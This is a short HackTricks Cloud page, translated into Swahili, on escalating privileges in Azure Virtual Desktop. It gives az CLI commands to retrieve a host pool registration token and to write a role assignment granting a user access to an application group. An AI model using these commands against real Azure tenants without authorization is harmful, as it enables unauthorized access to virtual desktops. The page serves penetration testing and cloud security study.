HackTricks CloudAz - Virtual Desktop Privesx
Reading time: 2 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Azure Virtual Desktop Privesc
Kwa maelezo zaidi kuhusu Azure Virtual Desktop angalia:
Microsoft.DesktopVirtualization/hostPools/retrieveRegistrationToken/action
Unaweza kupata token ya usajili inayotumika kujiandikisha kwa mashine za virtual ndani ya host pool.
az desktopvirtualization hostpool retrieve-registration-token -n testhostpool -g Resource_Group_1
Microsoft.Authorization/roleAssignments/read, Microsoft.Authorization/roleAssignments/write
warning
Mshambuliaji mwenye ruhusa hizi anaweza kufanya mambo hatari zaidi kuliko haya.
Kwa ruhusa hizi unaweza kuongeza mgawo wa mtumiaji kwenye kundi la Programu, ambalo linahitajika ili kufikia mashine ya virtual ya desktop ya virtual:
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP_NAME>/providers/Microsoft.DesktopVirtualization/applicationGroups/<APP_GROUP_NAME>/providers/Microsoft.Authorization/roleAssignments/<NEW_ROLE_ASSIGNMENT_GUID>?api-version=2022-04-01" \
--body '{
"properties": {
"roleDefinitionId": "/subscriptions/<SUBSCRIPTION_ID>/providers/Microsoft.Authorization/roleDefinitions/1d18fff3-a72a-46b5-b4a9-0b38a3cd7e63",
"principalId": "<USER_OBJECT_ID>"
}
}'
Kumbuka kwamba ili mtumiaji aweze kufikia Desktop au programu, pia anahitaji jukumu la Virtual Machine User Login au Virtual Machine Administrator Login juu ya VM.
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.